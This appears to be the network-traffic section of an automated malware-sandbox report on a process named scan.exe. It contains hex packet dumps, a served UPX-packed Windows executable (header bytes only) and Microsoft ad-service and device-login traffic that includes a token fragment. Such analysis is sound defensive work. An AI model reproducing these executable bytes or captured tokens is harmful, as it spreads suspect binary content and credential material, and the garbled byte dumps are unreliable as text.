                                                                                                          Aug 13, 2022 09:07:15.837558985 CEST4961INData Raw: f1 51 4c 54 38 67 2f fa 6f 29 1f 5c c4 e7 e8 2d f3 05 50 b8 c6 47 9b e9 a3 1d a6 12 be 83 f3 84 f6 d9 48 40 06 ba 0b db 07 26 8d 14 19 0e fa 03 32 02 73 36 6a 5a 93 54 fc 34 d6 20 e2 29 5f f8 c3 85 c8 c9 7c 1e 76 20 19 d2 bf b4 d3 f0 31 0a ff e7
                                                                                                          Data Ascii: QLT8g/o)\-PGH@&2s6jZT4 )_|v 1!07A"V~hm422!@X.y6d"NRq!b)mr5ojG?)ZX ~;hM"y_:
                                                                                                          Aug 13, 2022 09:07:15.837583065 CEST4962INData Raw: 03 da 5d 7f 0e bb 09 d9 e8 30 d9 02 77 ae 9c 3c df 3a 7f 7c 20 12 83 0d 6a c1 63 23 f6 26 01 0f 7b e8 03 9a 55 69 49 8b 3f 5b 7f 87 d1 d6 08 fc 86 89 ec 86 40 87 df 84 98 91 c0 16 c7 30 29 07 85 b6 17 06 5a 08 27 ce 68 f1 05 be 67 15 39 91 c8 0c
                                                                                                          Data Ascii: ]0w<:| jc#&{UiI?[@0)Z'hg9u.RKKz4*;O(z@AH>:k!0dF08@&Kn%Cp5r\"Pa0"Y:~{D1X
                                                                                                          Aug 13, 2022 09:07:15.837605000 CEST4964INData Raw: 77 10 cc 45 31 ff 81 8c 57 c6 a2 53 de 4a 08 ec 85 3f 9e c9 23 11 37 d3 c7 05 02 e1 06 d3 14 7f 3f 0f 72 48 f3 f7 51 3e 3f 30 d7 6c 12 db 67 af ea 7c 18 e8 31 fe 39 08 47 93 09 e5 7c ed 09 3c 24 3f 1f 03 2a 70 26 06 31 1e 8e e9 6b df 16 28 7a e2
                                                                                                          Data Ascii: wE1WSJ?#7?rHQ>?0lg|19G|<$?*p&1k(zkxlWVtPL+*<])&fQtP0(nE$>@8F2R8L`obLH5"t?cXT8@#e`9t4F 42L09p*x `P\
                                                                                                          Aug 13, 2022 09:07:15.837630987 CEST4965INData Raw: db 7e a2 96 f6 7e 8e ca d4 66 0b 7b 89 41 10 eb 0e 15 a4 f7 07 34 98 79 f2 05 64 eb 2e b8 60 6e d2 6c 32 04 13 03 e6 7a 96 f8 0a b0 d7 6c 18 4e f9 e8 06 d2 0a 5e 31 0a 99 11 66 3e 18 44 73 9b ad b8 0f 48 20 eb 09 6a 2a e2 f1 47 48 26 b0 95 a7 c7
                                                                                                          Data Ascii: ~~f{A4yd.`nl2zlN^1f>DsH j*GH&08lz#j!im13YD^#8:j3s #? BGXu/x%~y5)buV8t9ALJ!ma`R9eJ,u~mHX
                                                                                                          Aug 13, 2022 09:07:15.837655067 CEST4966INData Raw: ff 55 c5 40 da d2 d5 ef 00 cc 69 54 c7 41 1c 21 06 a7 ff e8 5e 10 a9 17 c6 42 35 62 6a 89 37 04 0e 1e 96 ea 7e 74 09 e7 01 8f 7f c7 c2 b8 86 8b cc f8 f9 84 8f bd 66 5a 7e c7 7b 1d 1b e6 41 f1 e8 72 dc 00 d2 89 2c 45 e5 0b 5c 0f a9 d0 69 3d 0e f0
                                                                                                          Data Ascii: U@iTA!^B5bj7~tfZ~{Ar,E\i=ytdLz{H4kl2[|'4 ,,;yDQD~S[HF!WHqIj`zS3Iz8$[l#P1`F|?Ky@p^idD~
                                                                                                          Aug 13, 2022 09:07:15.837680101 CEST4968INData Raw: 07 c9 c2 d8 40 20 58 29 a4 b9 ac ee 28 28 30 8f 24 57 c8 66 b7 28 3f 3f 9c 4e c8 39 c6 80 c9 40 88 b9 a3 1f dd 1a 2f 86 11 90 16 d8 e8 90 4a 79 5e 91 b1 8e 5f 01 f2 b6 4b 8b 63 40 a6 ff c3 09 50 a5 77 96 45 6d 34 e9 9c 3f fb e8 e9 9e a2 04 25 34
                                                                                                          Data Ascii: @ X)((0$Wf(??N9@/Jy^_Kc@PwEm4?%4!!n5dM_BV@%?=?==$J;=bTjksT'1:sF>cz]NI3YHM@#^e?Fdi
                                                                                                          Aug 13, 2022 09:07:15.855138063 CEST4969INData Raw: 26 76 80 d9 49 7d 2d 3d 04 14 80 6b 36 af ad 5a 12 55 0d 70 49 f9 1d 0a b8 2f 37 75 da 0a 0c 4c 1e 72 62 c9 13 e4 92 4a 77 3f 7d 16 31 80 49 0e 19 39 9b 2b 8a 92 cf d7 53 3f 11 7e d6 0c f1 0a 83 1c 39 64 b0 5b f3 2c 4a 49 a5 32 21 9b 96 b1 0e 19
                                                                                                          Data Ascii: &vI}-=k6ZUpI/7uLrbJw?}1I9+S?~9d[,JI2!9v3JeB[Vq<KJ`19sBA2[+RJCFcR[Vq /*T1C.|>'![{T*rJ!CT*r[Vq2*
                                                                                                          Aug 13, 2022 09:07:44.009605885 CEST10063INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                          Date: Sat, 13 Aug 2022 07:07:43 GMT
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Length: 2474496
                                                                                                          Last-Modified: Mon, 18 May 2020 15:20:04 GMT
                                                                                                          Connection: keep-alive
                                                                                                          ETag: "5ec2a7a4-25c200"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 44 53 c2 5e 00 00 00 00 00 00 00 00 f0 00 2f 02 0b 02 02 22 00 60 25 00 00 60 00 00 00 b0 70 00 b0 1b 96 00 00 c0 70 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 80 96 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 7c 96 00 dc 02 00 00 00 20 96 00 ec 5c 00 00 00 f0 5c 00 38 aa 02 00 00 00 00 00 00 00 00 00 c8 7f 96 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1d 96 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 b0 70 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 60 25 00 00 c0 70 00 00 60 25 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 60 00 00 00 20 96 00 00 60 00 00 00 62 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 33 2e 39 36 00 55 50 58 21 0d 24 08 07 88 a5 58 27 59 83 37 56 73 fe 95 00 7e 5b 25 00 00 6e 63 00 00 00 00 4d ff bf 29 ff c3 66 66 2e 0f 1f 84 00 0e 40 00 48 83 ec 28 48 8b 05 a5 3d 5b 00 31 e4 d8 79 f7 c9 c7 00 01 2c 1c a6 19 a9 7f 73 40 06 6c 4f 35 66 81 38 4d 5a 75 0f 9f b7 6d fe 48 63 50 3c 48 01 d0 50 45 34 74 69 52 32 89 0d ef f6 ee ff 98 cf 62 00 8b 00 85 c0 75 46 b9 69 e8 94 aa 34 08 a7 b3 34 7c 15 07 39 fb cd 10 37 8b 12 89 10 e8 87 1f e0 36 d0 33 b8 e0 6f 76 bd 60 21 83 38 01 74 53 31 c0 4c c4 28 c3 78 f7 e9 36 5f b9 02 8b 4e eb b8 1f 0f b7 50 18 37 f8 ae 2d 04 fa 0b 4a 45 0d 02 75 85 83 b8 bb 0e 0f 86 ee 2f b8 db 78 ff 00 8b 90 f8 18 b2 85 d2 0f 95 c1 e9 66 22 cc 6e 6f d7 68 80 22 bc 8d 0d 01 d1 ca e8 cc d7 08 bd be 3f ef 76 44 2e 83 78 74 74 3d 44 8b 80 e8 77 45 e0 e1 d3 09 7a 79 29 66 90 5e 38 f8 fb fe b3 54 05 85 4c 8d 05 c6 ce 62 92 15 c7 0d 0d c8 ce f7 4a 73 37 d7 89 05 9c 1d 38 95 89 44 24 20 5e f0 13 bc 9d 15 a0 08 e8 a5 a9 70 86 c4 38 c3 eb be ff 5f 0f 41 55 41 54 55 57 56 53 48 81 ec 98 1c b9 0d e5 c0 b4 82 ca ed 3f 6c 4c 89 c7 f3 48 ab 78 3d e8 3b 0f 0e fe e2 76 f0 c9 0f 85 ac fe 65 26 04 25 30 05 1d 3c 34 5b 3f 68 f8 ff 0c 70 08 31 ed 4c 8b 25 f3 24 95 2c 16 8f 48 39 c6 fc 05 df ef 0f 84 1f 58 b9 e8 03 ca ff d4 12 e8 f0 48 0f b1 33 48 da b7 b3 5d 16 e2 70 35 13 68 8b 06 83 f8 01 50 0d e2 9f 66 76 14 32 12 7c c7 05 da cd 62 ee b6 cf ed c7 3d 03 85 ed 0e 1c 02 e7 05 38 33 3f 2c f8 55 00 92 74 0c 45 58 ba 02 4d ff d0 36 b8 ed f0 e8 3f d3 33 0f 88 d6 0c ff 15 56 18 58 5e 60 f8 ce 15 8b 26 84 fd 7a 04 02 e8 bc ae 6d 70 57 2c fe bf 10 35 5c 49 02 43 f4 d9 bd 50 e8 74 b1 34 86 ab 75 1c eb 58 47 84 c3 47 c5 8a d2 b0 83 e1 ba 27
                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdDS^/"`%`pp@ | \\8(UPX0pUPX1`%p`%@.rsrc` `b%@3.96UPX!$X'Y7Vs~[%ncM)ff.@H(H=[1y,s@lO5f8MZumHcP<HPE4tiR2buFi44|9763ov`!8tS1L(x6_NP7-JEu/xf"noh"?vD.xtt=DwEzy)f^8TLbJs78D$ ^p8_AUATUWVSH?lLHx=;ve&%0<4[?hp1L%$,H9XH3H]p5hPfv2|b=83?,UtEXM6?3VX^`&zmpW,5\ICPt4uXGG'


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          4192.168.2.74976740.126.32.72443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          5192.168.2.74976820.190.159.3443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          6192.168.2.74976920.199.120.182443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          7192.168.2.74977020.190.159.3443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          8192.168.2.74977120.190.159.3443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          9192.168.2.74977420.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          0192.168.2.74971820.82.209.183443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:06:24 UTC0OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20220308T161834Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=4bad966783af4e32bdf64b1a321783c7&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1418173&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=VMware7%2C1&tl=2&tsu=1418173&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32220&sc=6
                                                                                                          Cache-Control: no-cache
                                                                                                          MS-CV: 2FQJG+OfpkWM/bI6.0
                                                                                                          User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                          X-SDK-HWF: tch0,m301,m751,mA01,mT01
                                                                                                          Host: arc.msn.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2022-08-13 07:06:24 UTC2INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-store, no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Content-Length: 167
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          ARC-RSP-DBG: [{"OPTOUTSTATE":"256"}]
                                                                                                          X-ARC-SIG: SGfGlj++OtQ1vXFsLFlyX43oAs73lUrSOqptwWUaTVrQCnsNNa2oEPljz/1nThVrU6/CkXR82VrW1vd+Q3xrZq3ybYikAXaXv8ECG42Ylv0vLIGS8o80Zxh32htCf24T0nWJf5/QbTjoX+70W4HTgj2M5gKYpKuaSEO1DECZMfutloM2YKqDgEXOSBKG2m9fwcRYMUL/69pHLH0fB3Wnc+lwxliISYrql9tFegctJvB28nBnsII2QqitJcjXKXr0JlcZfF54dGQmmvUiP/RMYjt2X3nTCLu2CnKGYwPoWiMVmtqpVSD+YtKpkP44XegC43lfdXUSNbr0cxVX+lzuyA==
                                                                                                          Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                          X-AspNet-Version: 4.0.30319
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                          Date: Sat, 13 Aug 2022 07:06:24 GMT
                                                                                                          Connection: close
                                                                                                          2022-08-13 07:06:24 UTC3INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 4e 5f 70 73 2c 20 45 72 72 6f 72 3a 20 4e 6f 20 65 6c 69 67 69 62 6c 65 20 63 6f 6e 74 65 6e 74 2e 29 2e 22 7d 5d 2c 22 72 65 66 72 65 73 68 74 69 6d 65 22 3a 22 32 30 32 32 2d 30 38 2d 31 33 54 31 31 3a 30 36 3a 32 34 22 7d 7d
                                                                                                          Data Ascii: {"batchrsp":{"ver":"1.0","errors":[{"code":2040,"msg":"Demand source returns error (Name: GN_ps, Error: No eligible content.)."}],"refreshtime":"2022-08-13T11:06:24"}}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          1192.168.2.74971920.82.209.183443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:06:24 UTC1OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20220308T161834Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=597682d23c7d4ea5a0eb32e465ddbc62&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1418173&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1418173&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32220&sc=6
                                                                                                          Cache-Control: no-cache
                                                                                                          MS-CV: 2FQJG+OfpkWM/bI6.0
                                                                                                          User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                          X-SDK-HWF: tch0,m301,m751,mA01,mT01
                                                                                                          Host: arc.msn.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2022-08-13 07:06:24 UTC3INHTTP/1.1 200 OK
                                                                                                          Cache-Control: public, max-age=551
                                                                                                          Content-Length: 53651
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          ARC-RSP-DBG: [{"RADIDS":"2,P425106554-T700342084-C128000000001392709+B+P80+S1,P425106558-T700342085-C128000000001392729+B+P80+S2"},{"BATCH_REDIRECT_STORE":"1,BB_9NXQXXLFST89_9WZDNCRFHVFW_9WZDNCRFJ3P2_9NCBCSZSJRSB_9NMPJ99VJBWV_9NBLGGH5FV99_9WZDNCRDFNG7+P0+S0"},{"BATCH_REDIRECT_STORE":"1,BB_9NBLGGGZM6WM_9WZDNCRFHWD2_9NH2GPH4JZS4_9NBLGGH6J6VK_9P6RC76MSMMJ_9WZDNCRFJ27N_9N0866FS04W8_9WZDNCRFJ10M_9WZDNCRFJ140_9NC2FBTHCJV8_9NBLGGH1CQ7L+P0+S0"},{"OPTOUTSTATE":"256"}]
                                                                                                          X-ARC-SIG: FR8y2kGdsNvQGj9+mQSc2FYxbi+hzuOu7GwckIvU7IrP4Ap6ABkq6c3HzRHvf04iw9eN2XMhuneCQTOsQfNkl6ufxFBAtVBmWjEsuPIwZRpqXv+2FIjaLhAixBYRe0LWAkKVRCjejpwov9ABtCL6XeoM1nJNh3tbUE9tGQWorpvpRXuMbQ6ZNX2OfH89K3/SZHjRMyTMo/Gw6DkoaqPpSW5ykfbZkz3delbVsAQEqkz6TelDmzDSdbQlr0civBS/Kt9AF6AHojyDDa0ivvwsW9lewgrz3RNKC8woKlOV2k0BSZ01XoCCxB53DpeWT+ocvk7ZlV03s3Kd/Vj0POfVMA==
                                                                                                          Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                          X-AspNet-Version: 4.0.30319
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                          Date: Sat, 13 Aug 2022 07:06:23 GMT
                                                                                                          Connection: close
                                                                                                          2022-08-13 07:06:24 UTC4INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 73 74 6f 72 65 43 61 6d 70 61 69 67 6e 49 64 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 74 65 78 74 5c 22 2c 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 7d 2c 5c 22 69 6e 73 74 61 6c 6c 44 65 6c 61 79 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 74 65 78 74 5c 22
                                                                                                          Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"u\":\"SubscribedContent\",\"c\":\"CDM\"}],\"ad\":{\"itemPropertyManifest\":{\"storeCampaignId\":{\"type\":\"text\",\"isOptional\":true},\"installDelay\":{\"type\":\"text\"
                                                                                                          2022-08-13 07:06:24 UTC19INData Raw: 74 69 64 3d 39 6e 62 6c 67 67 68 35 66 76 39 39 26 6f 63 69 64 3d 65 6d 73 2e 64 63 6f 2e 73 74 61 72 74 70 72 6f 67 72 61 6d 6d 61 62 6c 65 26 63 63 69 64 3d 35 35 66 65 33 37 61 35 38 32 35 38 34 35 38 36 61 61 33 31 38 65 61 33 32 64 38 64 61 35 39 35 26 63 69 64 3d 6d 73 66 74 5f 31 5c 22 7d 2c 5c 22 61 63 74 69 6f 6e 5c 22 3a 5c 22 6c 61 75 6e 63 68 55 72 69 5c 22 7d 2c 5c 22 6f 6e 52 65 6e 64 65 72 5c 22 3a 7b 5c 22 65 76 65 6e 74 5c 22 3a 5c 22 6f 70 70 6f 72 74 75 6e 69 74 79 5c 22 2c 5c 22 70 61 72 61 6d 65 74 65 72 73 5c 22 3a 7b 7d 2c 5c 22 61 63 74 69 6f 6e 5c 22 3a 5c 22 6e 6f 4f 70 5c 22 7d 2c 5c 22 69 6e 73 74 61 6c 6c 41 70 70 5c 22 3a 7b 5c 22 62 6f 6f 6c 5c 22 3a 74 72 75 65 7d 2c 5c 22 70 61 63 6b 61 67 65 53 69 7a 65 5c 22 3a 7b 5c 22
                                                                                                          Data Ascii: tid=9nblggh5fv99&ocid=ems.dco.startprogrammable&ccid=55fe37a582584586aa318ea32d8da595&cid=msft_1\"},\"action\":\"launchUri\"},\"onRender\":{\"event\":\"opportunity\",\"parameters\":{},\"action\":\"noOp\"},\"installApp\":{\"bool\":true},\"packageSize\":{\"
                                                                                                          2022-08-13 07:06:24 UTC35INData Raw: 6f 6e 5c 22 3a 5c 22 6c 61 75 6e 63 68 55 72 69 5c 22 7d 2c 5c 22 6f 6e 52 65 6e 64 65 72 5c 22 3a 7b 5c 22 65 76 65 6e 74 5c 22 3a 5c 22 6f 70 70 6f 72 74 75 6e 69 74 79 5c 22 2c 5c 22 70 61 72 61 6d 65 74 65 72 73 5c 22 3a 7b 7d 2c 5c 22 61 63 74 69 6f 6e 5c 22 3a 5c 22 6e 6f 4f 70 5c 22 7d 2c 5c 22 69 6e 73 74 61 6c 6c 41 70 70 5c 22 3a 7b 5c 22 62 6f 6f 6c 5c 22 3a 66 61 6c 73 65 7d 2c 5c 22 70 61 63 6b 61 67 65 53 69 7a 65 5c 22 3a 7b 5c 22 6e 75 6d 62 65 72 5c 22 3a 34 31 30 33 36 31 36 32 32 2e 30 7d 2c 5c 22 73 68 6f 77 4e 61 6d 65 4f 6e 4d 65 64 69 75 6d 54 69 6c 65 5c 22 3a 7b 5c 22 62 6f 6f 6c 5c 22 3a 74 72 75 65 7d 2c 5c 22 73 68 6f 77 4e 61 6d 65 4f 6e 57 69 64 65 54 69 6c 65 5c 22 3a 7b 5c 22 62 6f 6f 6c 5c 22 3a 74 72 75 65 7d 2c 5c 22 73
                                                                                                          Data Ascii: on\":\"launchUri\"},\"onRender\":{\"event\":\"opportunity\",\"parameters\":{},\"action\":\"noOp\"},\"installApp\":{\"bool\":false},\"packageSize\":{\"number\":410361622.0},\"showNameOnMediumTile\":{\"bool\":true},\"showNameOnWideTile\":{\"bool\":true},\"s
                                                                                                          2022-08-13 07:06:24 UTC51INData Raw: 59 72 74 74 4c 46 38 62 66 5c 2f 33 66 77 3d 5c 22 2c 5c 22 66 69 6c 65 53 69 7a 65 5c 22 3a 31 37 30 31 38 7d 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 5c 22 3a 7b 5c 22 6e 75 6d 62 65 72 5c 22 3a 32 2e 30 7d 2c 5c 22 6d 65 64 69 75 6d 54 69 6c 65 5c 22 3a 7b 5c 22 69 6d 61 67 65 5c 22 3a 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 5c 2f 69 6d 61 67 65 5c 2f 61 70 70 73 2e 33 31 32 32 35 2e 31 33 35 37 36 37 34 38 34 31 34 35 36 36 39 35 35 2e 33 64 39 38 36 34 38 30 2d 38 63 31 65 2d 34 32 37 31 2d 39 63 37 63 2d 61 39 30 36 31 39 30 30 32 30 38 34 2e 33 66 66 64 39 61 62 64 2d 30 39 34 64 2d 34 35 39 34 2d 62 36 63 33 2d 38 65 30 37 39 32 39 38 62 38 34 62 3f 66 6f 72 6d 61 74 3d
                                                                                                          Data Ascii: YrttLF8bf\/3fw=\",\"fileSize\":17018},\"collection\":{\"number\":2.0},\"mediumTile\":{\"image\":\"https:\/\/store-images.s-microsoft.com\/image\/apps.31225.13576748414566955.3d986480-8c1e-4271-9c7c-a90619002084.3ffd9abd-094d-4594-b6c3-8e079298b84b?format=


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          10192.168.2.74977520.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:18 UTC157OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 61 61 36 61 34 66 66 61 34 37 32 32 64 62 35 0d 0a 0d 0a
                                                                                                          Data Ascii: CNT 1 CON 246Context: 9aa6a4ffa4722db5
                                                                                                          2022-08-13 07:07:18 UTC157OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                                                                          2022-08-13 07:07:18 UTC157OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 61 61 36 61 34 66 66 61 34 37 32 32 64 62 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 57 6b 74 37 34 4d 42 39 2f 56 59 74 4b 33 69 75 73 6b 66 74 56 71 4b 4d 38 49 4d 66 33 38 37 73 67 61 4d 39 50 6c 48 38 62 30 47 70 6a 4a 73 68 42 59 44 47 50 56 37 78 74 51 54 44 53 55 32 51 49 41 76 47 74 32 41 64 57 35 7a 2b 49 54 79 48 6e 54 74 58 65 44 77 79 77 31 70 53 4a 4a 35 73 47 58 48 70 4d 65 42 38 63 2b 4d 7a 67 5a 75 76 4a 76 59 56 5a 2f 43 63 46 76 78 43 35 6a 63 48 56 38 46 30 66 54 77
